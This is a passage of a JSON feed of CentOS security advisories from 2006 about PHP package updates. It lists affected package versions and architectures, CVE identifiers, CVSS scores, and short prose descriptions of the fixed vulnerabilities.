{"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.18", "packageFilename": "php-gd-4.3.9-3.18.i386.rpm", "packageName": "php-gd", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.18", "packageFilename": "php-4.3.9-3.18.x86_64.rpm", "packageName": "php", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.18", "packageFilename": "php-snmp-4.3.9-3.18.x86_64.rpm", "packageName": "php-snmp", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.18", "packageFilename": "php-4.3.9-3.18.s390.rpm", "packageName": "php", "arch": "s390", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.18", "packageFilename": "php-pgsql-4.3.9-3.18.s390x.rpm", "packageName": "php-pgsql", "arch": "s390x", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "4.3.2-36.ent", "packageFilename": "php-imap-4.3.2-36.ent.i386.rpm", "packageName": "php-imap", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "4.3.2-36.ent", "packageFilename": "php-ldap-4.3.2-36.ent.ia64.rpm", "packageName": "php-ldap", "arch": "ia64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.18", "packageFilename": "php-snmp-4.3.9-3.18.ia64.rpm", "packageName": "php-snmp", "arch": "ia64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "4.3.2-36.ent", "packageFilename": "php-4.3.2-36.ent.ia64.rpm", "packageName": "php", "arch": "ia64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.18", "packageFilename": "php-xmlrpc-4.3.9-3.18.i386.rpm", "packageName": "php-xmlrpc", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.18", "packageFilename": "php-odbc-4.3.9-3.18.s390.rpm", "packageName": "php-odbc", "arch": "s390", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.18", "packageFilename": "php-gd-4.3.9-3.18.ia64.rpm", "packageName": "php-gd", "arch": "ia64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "4.3.2-36.ent", "packageFilename": "php-4.3.2-36.ent.i386.rpm", "packageName": "php", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.18", "packageFilename": "php-odbc-4.3.9-3.18.s390x.rpm", "packageName": "php-odbc", "arch": "s390x", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "4.3.2-36.ent", "packageFilename": "php-devel-4.3.2-36.ent.s390x.rpm", "packageName": "php-devel", "arch": "s390x", "operator": "lt"}], "description": "**CentOS Errata and Security Advisory** CESA-2006:0669\n\n\nPHP is an HTML-embedded scripting language commonly used with the Apache\r\nHTTP Web server.\r\n\r\nA response-splitting issue was discovered in the PHP session handling. If\r\na remote attacker can force a carefully crafted session identifier to be\r\nused, a cross-site-scripting or response-splitting attack could be\r\npossible. (CVE-2006-3016)\r\n\r\nA buffer overflow was discovered in the PHP sscanf() function. If a script\r\nused the sscanf() function with positional arguments in the format string,\r\na remote attacker sending a carefully crafted request could execute\r\narbitrary code as the 'apache' user. (CVE-2006-4020)\r\n\r\nAn integer overflow was discovered in the PHP wordwrap() and str_repeat()\r\nfunctions. If a script running on a 64-bit server used either of these\r\nfunctions on untrusted user data, a remote attacker sending a carefully\r\ncrafted request might be able to cause a heap overflow. (CVE-2006-4482)\r\n\r\nA buffer overflow was discovered in the PHP gd extension. If a script was\r\nset up to process GIF images from untrusted sources using the gd extension,\r\na remote attacker could cause a heap overflow. (CVE-2006-4484)\r\n\r\nAn integer overflow was discovered in the PHP memory allocation handling. \r\nOn 64-bit platforms, the \"memory_limit\" setting was not enforced correctly,\r\nwhich could allow a denial of service attack by a remote user. (CVE-2006-4486)\r\n\r\nUsers of PHP should upgrade to these updated packages which contain\r\nbackported patches to correct these issues. These packages also contain a\r\nfix for a bug where certain input strings to the metaphone() function could\r\ncause memory corruption.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2006-September/013277.html\nhttp://lists.centos.org/pipermail/centos-announce/2006-September/013278.html\nhttp://lists.centos.org/pipermail/centos-announce/2006-September/013279.html\nhttp://lists.centos.org/pipermail/centos-announce/2006-September/013280.html\nhttp://lists.centos.org/pipermail/centos-announce/2006-September/013281.html\nhttp://lists.centos.org/pipermail/centos-announce/2006-September/013282.html\nhttp://lists.centos.org/pipermail/centos-announce/2006-September/013283.html\nhttp://lists.centos.org/pipermail/centos-announce/2006-September/013284.html\n\n**Affected packages:**\nphp\nphp-devel\nphp-domxml\nphp-gd\nphp-imap\nphp-ldap\nphp-mbstring\nphp-mysql\nphp-ncurses\nphp-odbc\nphp-pear\nphp-pgsql\nphp-snmp\nphp-xmlrpc\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2006-0669.html", "edition": 2, "reporter": "CentOS Project", "published": "2006-09-21T11:36:12", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "title": "php security update", "type": "centos", "bulletinFamily": "unix", "cvelist": ["CVE-2006-4486", "CVE-2006-4484", "CVE-2006-4020", "CVE-2006-3016", "CVE-2006-4482"], "modified": "2006-09-21T16:17:59", "href": "http://lists.centos.org/pipermail/centos-announce/2006-September/013277.html", "id": "CESA-2006:0669", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-24T23:00:26", "references": ["https://rhn.redhat.com/errata/rh21as-errata.html", "http://www.ict.swin.edu.au/staff/jnewbigin"], "affectedPackage": [{"OS": "CentOS", "OSVersion": "2", "packageVersion": "4.1.2-2.11", "packageFilename": "php-odbc-4.1.2-2.11.i386.rpm", "packageName": "php-odbc", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "2", "packageVersion": "4.1.2-2.11", "packageFilename": "php-imap-4.1.2-2.11.i386.rpm", "packageName": "php-imap", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "2", "packageVersion": "4.1.2-2.11", "packageFilename": "php-4.1.2-2.11.i386.rpm", "packageName": "php", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "2", "packageVersion": "4.1.2-2.11", "packageFilename": "php-manual-4.1.2-2.11.i386.rpm", "packageName": "php-manual", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "2", "packageVersion": "4.1.2-2.11", "packageFilename": "php-mysql-4.1.2-2.11.i386.rpm", "packageName": "php-mysql", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "2", "packageVersion": "4.1.2-2.11", "packageFilename": "php-ldap-4.1.2-2.11.i386.rpm", "packageName": "php-ldap", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "2", "packageVersion": "4.1.2-2.11", "packageFilename": "php-pgsql-4.1.2-2.11.i386.rpm", "packageName": "php-pgsql", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "2", "packageVersion": "4.1.2-2.11", "packageFilename": "php-devel-4.1.2-2.11.i386.rpm", "packageName": "php-devel", "arch": "i386", "operator": "lt"}], "description": "**CentOS Errata and Security Advisory** CESA-2006:0682-01\n\n\nPHP is an HTML-embedded scripting language commonly used with the Apache\r\nHTTP Web server.\r\n\r\nA response-splitting issue was discovered in the PHP session handling. If\r\na remote attacker can force a carefully crafted session identifier to be\r\nused, a cross-site-scripting or response-splitting attack could be\r\npossible. (CVE-2006-3016)\r\n\r\nA buffer overflow was discovered found in the PHP sscanf() function. If a\r\nscript used the sscanf() function with positional arguments in the format\r\nstring, a remote attacker sending a carefully crafted request could execute\r\narbitrary code as the 'apache' user. (CVE-2006-4020)\r\n\r\nAn integer overflow was discovered in the PHP wordwrap() and str_repeat()\r\nfunctions. If a script running on a 64-bit server used either of these\r\nfunctions on untrusted user data, a remote attacker sending a carefully\r\ncrafted request might be able to cause a heap overflow. (CVE-2006-4482)\r\n\r\nAn integer overflow was discovered in the PHP memory allocation handling. \r\nOn 64-bit platforms, the \"memory_limit\" setting was not enforced correctly,\r\nwhich could allow a denial of service attack by a remote user. (CVE-2006-4486)\r\n\r\nUsers of PHP should upgrade to these updated packages which contain\r\nbackported patches to correct these issues. These packages also contain a\r\nfix for a bug where certain input strings to the metaphone() function could\r\ncause memory corruption.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2006-September/013285.html\n\n**Affected packages:**\nphp\nphp-devel\nphp-imap\nphp-ldap\nphp-manual\nphp-mysql\nphp-odbc\nphp-pgsql\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/rh21as-errata.html", "edition": 3, "reporter": "CentOS Project", "published": "2006-09-25T01:32:16", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "title": "php security update", "type": "centos", "bulletinFamily": "unix", "cvelist": ["CVE-2006-4486", "CVE-2006-4020", "CVE-2006-3016", "CVE-2006-4482"], "modified": "2006-09-25T01:32:16", "href": "http://lists.centos.org/pipermail/centos-announce/2006-September/013285.html", "id": "CESA-2006:0682-01", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-10-12T14:47:10", "references": ["https://rhn.redhat.com/errata/rh21as-errata.html", "http://www.ict.swin.edu.au/staff/jnewbigin"], "affectedPackage": [{"OS": "CentOS", "OSVersion": "2", "packageVersion": "4.1.2-2.13", "packageFilename": "php-manual-4.1.2-2.13.i386.rpm", "packageName": "php-manual", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "2", "packageVersion": "4.1.2-2.13", "packageFilename": "php-mysql-4.1.2-2.13.i386.rpm", "packageName": "php-mysql", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "2", "packageVersion": "4.1.2-2.13", "packageFilename": "php-ldap-4.1.2-2.13.i386.rpm", "packageName": "php-ldap", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "2", "packageVersion": "4.1.2-2.13", "packageFilename": "php-devel-4.1.2-2.13.i386.rpm", "packageName": "php-devel", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "2", "packageVersion": "4.1.2-2.13", "packageFilename": "php-pgsql-4.1.2-2.13.i386.rpm", "packageName": "php-pgsql", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "2", "packageVersion": "4.1.2-2.13", "packageFilename": "php-odbc-4.1.2-2.13.i386.rpm", "packageName": "php-odbc", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "2", "packageVersion": "4.1.2-2.13", "packageFilename": "php-4.1.2-2.13.i386.rpm", "packageName": "php", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "2", "packageVersion": "4.1.2-2.13", "packageFilename": "php-imap-4.1.2-2.13.i386.rpm", "packageName": "php-imap", "arch": "i386", "operator": "lt"}], "description": "**CentOS Errata and Security Advisory** CESA-2006:0730-01\n\n\nPHP is an HTML-embedded scripting language commonly used with the Apache\r\nHTTP Web server. \r\n\r\nThe Hardened-PHP Project discovered an overflow in the PHP htmlentities()\r\nand htmlspecialchars() routines. If a PHP script used the vulnerable\r\nfunctions to parse UTF-8 data, a remote attacker sending a carefully\r\ncrafted request could trigger the overflow and potentially execute\r\narbitrary code as the 'apache' user. (CVE-2006-5465) \r\n\r\nUsers of PHP should upgrade to these updated packages which contain a\r\nbackported patch to correct this issue.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2006-November/013355.html\n\n**Affected packages:**\nphp\nphp-devel\nphp-imap\nphp-ldap\nphp-manual\nphp-mysql\nphp-odbc\nphp-pgsql\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/rh21as-errata.html", "edition": 2, "reporter": "CentOS Project", "published": "2006-11-07T22:35:30", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "php security update", "type": "centos", "bulletinFamily": "unix", "cvelist": ["CVE-2006-5465"], "modified": "2006-11-07T22:35:30", "href": "http://lists.centos.org/pipermail/centos-announce/2006-November/013355.html", "id": "CESA-2006:0730-01", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-10-12T14:45:44", "references": ["http://pasi.pirhonen.eu/", "https://rhn.redhat.com/errata/RHSA-2006-0730.html", "http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xBEFA581B"], "affectedPackage": [{"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "i386", "packageName": "php-odbc", "packageFilename": "php-odbc-4.3.9-3.22.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "s390", "packageName": "php-devel", "packageFilename": "php-devel-4.3.9-3.22.s390.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "4.3.2-37.ent", "arch": "s390", "packageName": "php-devel", "packageFilename": "php-devel-4.3.2-37.ent.s390.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "ia64", "packageName": "php-pear", "packageFilename": "php-pear-4.3.9-3.22.ia64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "s390x", "packageName": "php-devel", "packageFilename": "php-devel-4.3.9-3.22.s390x.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "i386", "packageName": "php-mysql", "packageFilename": "php-mysql-4.3.9-3.22.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "ia64", "packageName": "php-snmp", "packageFilename": "php-snmp-4.3.9-3.22.ia64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "4.3.2-37.ent", "arch": "i386", "packageName": "php-devel", "packageFilename": "php-devel-4.3.2-37.ent.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "4.3.2-37.ent", "arch": "s390", "packageName": "php-imap", "packageFilename": "php-imap-4.3.2-37.ent.s390.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "s390x", "packageName": "php-odbc", "packageFilename": "php-odbc-4.3.9-3.22.s390x.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "4.3.2-37.ent", "arch": "ia64", "packageName": "php-mysql", "packageFilename": "php-mysql-4.3.2-37.ent.ia64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "i386", "packageName": "php-ncurses", "packageFilename": "php-ncurses-4.3.9-3.22.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "i386", "packageName": "php-pear", "packageFilename": "php-pear-4.3.9-3.22.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "4.3.2-37.ent", "arch": "s390x", "packageName": "php-mysql", "packageFilename": "php-mysql-4.3.2-37.ent.s390x.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "4.3.2-37.ent", "arch": "ia64", "packageName": "php-ldap", "packageFilename": "php-ldap-4.3.2-37.ent.ia64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "4.3.2-37.ent", "arch": "any", "packageName": "php", "packageFilename": "php-4.3.2-37.ent.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "4.3.2-37.ent", "arch": "any", "packageName": "php", "packageFilename": "php-4.3.2-37.ent.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "x86_64", "packageName": "php-imap", "packageFilename": "php-imap-4.3.9-3.22.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "i386", "packageName": "php-devel", "packageFilename": "php-devel-4.3.9-3.22.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "x86_64", "packageName": "php-pear", "packageFilename": "php-pear-4.3.9-3.22.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "4.3.2-37.ent", "arch": "i386", "packageName": "php-pgsql", "packageFilename": "php-pgsql-4.3.2-37.ent.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "s390", "packageName": "php-odbc", "packageFilename": "php-odbc-4.3.9-3.22.s390.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "s390", "packageName": "php-ldap", "packageFilename": "php-ldap-4.3.9-3.22.s390.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "s390x", "packageName": "php-pear", "packageFilename": "php-pear-4.3.9-3.22.s390x.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "s390x", "packageName": "php-gd", "packageFilename": "php-gd-4.3.9-3.22.s390x.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "i386", "packageName": "php-domxml", "packageFilename": "php-domxml-4.3.9-3.22.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "s390x", "packageName": "php-ldap", "packageFilename": "php-ldap-4.3.9-3.22.s390x.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "ia64", "packageName": "php-devel", "packageFilename": "php-devel-4.3.9-3.22.ia64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "4.3.2-37.ent", "arch": "s390x", "packageName": "php-ldap", "packageFilename": "php-ldap-4.3.2-37.ent.s390x.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "s390", "packageName": "php-mbstring", "packageFilename": "php-mbstring-4.3.9-3.22.s390.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "ia64", "packageName": "php-domxml", "packageFilename": "php-domxml-4.3.9-3.22.ia64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "s390x", "packageName": "php-mysql", "packageFilename": "php-mysql-4.3.9-3.22.s390x.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "4.3.2-37.ent", "arch": "x86_64", "packageName": "php-imap", "packageFilename": "php-imap-4.3.2-37.ent.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "x86_64", "packageName": "php-pgsql", "packageFilename": "php-pgsql-4.3.9-3.22.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "s390", "packageName": "php-gd", "packageFilename": "php-gd-4.3.9-3.22.s390.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "4.3.2-37.ent", "arch": "s390x", "packageName": "php-devel", "packageFilename": "php-devel-4.3.2-37.ent.s390x.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "ia64", "packageName": "php-mysql", "packageFilename": "php-mysql-4.3.9-3.22.ia64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "4.3.2-37.ent", "arch": "i386", "packageName": "php-imap", "packageFilename": "php-imap-4.3.2-37.ent.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "s390x", "packageName": "php-ncurses", "packageFilename": "php-ncurses-4.3.9-3.22.s390x.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "4.3.2-37.ent", "arch": "s390", "packageName": "php-ldap", "packageFilename": "php-ldap-4.3.2-37.ent.s390.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "4.3.2-37.ent", "arch": "x86_64", "packageName": "php-odbc", "packageFilename": "php-odbc-4.3.2-37.ent.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "i386", "packageName": "php-mbstring", "packageFilename": "php-mbstring-4.3.9-3.22.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "4.3.2-37.ent", "arch": "s390", "packageName": "php-odbc", "packageFilename": "php-odbc-4.3.2-37.ent.s390.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "s390", "packageName": "php-imap", "packageFilename": "php-imap-4.3.9-3.22.s390.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "4.3.2-37.ent", "arch": "x86_64", "packageName": "php-ldap", "packageFilename": "php-ldap-4.3.2-37.ent.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "x86_64", "packageName": "php", "packageFilename": "php-4.3.9-3.22.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "4.3.2-37.ent", "arch": "s390x", "packageName": "php-odbc", "packageFilename": "php-odbc-4.3.2-37.ent.s390x.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "ia64", "packageName": "php-ldap", "packageFilename": "php-ldap-4.3.9-3.22.ia64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "s390", "packageName": "php-pear", "packageFilename": "php-pear-4.3.9-3.22.s390.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "x86_64", "packageName": "php-domxml", "packageFilename": "php-domxml-4.3.9-3.22.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "4.3.2-37.ent", "arch": "ia64", "packageName": "php-imap", "packageFilename": "php-imap-4.3.2-37.ent.ia64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "ia64", "packageName": "php", "packageFilename": "php-4.3.9-3.22.ia64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "s390", "packageName": "php", "packageFilename": "php-4.3.9-3.22.s390.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "s390x", "packageName": "php-domxml", "packageFilename": "php-domxml-4.3.9-3.22.s390x.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "s390x", "packageName": "php-mbstring", "packageFilename": "php-mbstring-4.3.9-3.22.s390x.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "4.3.2-37.ent", "arch": "ia64", "packageName": "php", "packageFilename": "php-4.3.2-37.ent.ia64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "x86_64", "packageName": "php-devel", "packageFilename": "php-devel-4.3.9-3.22.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "x86_64", "packageName": "php-ncurses", "packageFilename": "php-ncurses-4.3.9-3.22.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "s390x", "packageName": "php-pgsql", "packageFilename": "php-pgsql-4.3.9-3.22.s390x.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "4.3.2-37.ent", "arch": "ia64", "packageName": "php-odbc", "packageFilename": "php-odbc-4.3.2-37.ent.ia64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "4.3.2-37.ent", "arch": "s390", "packageName": "php-pgsql", "packageFilename": "php-pgsql-4.3.2-37.ent.s390.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "any", "packageName": "php", "packageFilename": "php-4.3.9-3.22.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "any", "packageName": "php", "packageFilename": "php-4.3.9-3.22.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "4.3.2-37.ent", "arch": "i386", "packageName": "php-mysql", "packageFilename": "php-mysql-4.3.2-37.ent.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "4.3.2-37.ent", "arch": "x86_64", "packageName": "php-mysql", "packageFilename": "php-mysql-4.3.2-37.ent.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "s390", "packageName": "php-mysql", "packageFilename": "php-mysql-4.3.9-3.22.s390.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "ia64", "packageName": "php-imap", "packageFilename": "php-imap-4.3.9-3.22.ia64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "4.3.2-37.ent", "arch": "s390x", "packageName": "php-pgsql", "packageFilename": "php-pgsql-4.3.2-37.ent.s390x.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "4.3.2-37.ent", "arch": "x86_64", "packageName": "php-pgsql", "packageFilename": "php-pgsql-4.3.2-37.ent.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "ia64", "packageName": "php-mbstring", "packageFilename": "php-mbstring-4.3.9-3.22.ia64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "s390x", "packageName": "php", "packageFilename": "php-4.3.9-3.22.s390x.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "s390", "packageName": "php-xmlrpc", "packageFilename": "php-xmlrpc-4.3.9-3.22.s390.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "ia64", "packageName": "php-odbc", "packageFilename": "php-odbc-4.3.9-3.22.ia64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "s390x", "packageName": "php-imap", "packageFilename": "php-imap-4.3.9-3.22.s390x.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "4.3.2-37.ent", "arch": "ia64", "packageName": "php-pgsql", "packageFilename": "php-pgsql-4.3.2-37.ent.ia64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "i386", "packageName": "php", "packageFilename": "php-4.3.9-3.22.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "i386", "packageName": "php-xmlrpc", "packageFilename": "php-xmlrpc-4.3.9-3.22.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "4.3.2-37.ent", "arch": "s390x", "packageName": "php", "packageFilename": "php-4.3.2-37.ent.s390x.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "s390x", "packageName": "php-xmlrpc", "packageFilename": "php-xmlrpc-4.3.9-3.22.s390x.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "x86_64", "packageName": "php-ldap", "packageFilename": "php-ldap-4.3.9-3.22.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "ia64", "packageName": "php-pgsql", "packageFilename": "php-pgsql-4.3.9-3.22.ia64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "s390", "packageName": "php-ncurses", "packageFilename": "php-ncurses-4.3.9-3.22.s390.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "4.3.2-37.ent", "arch": "ia64", "packageName": "php-devel", "packageFilename": "php-devel-4.3.2-37.ent.ia64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "x86_64", "packageName": 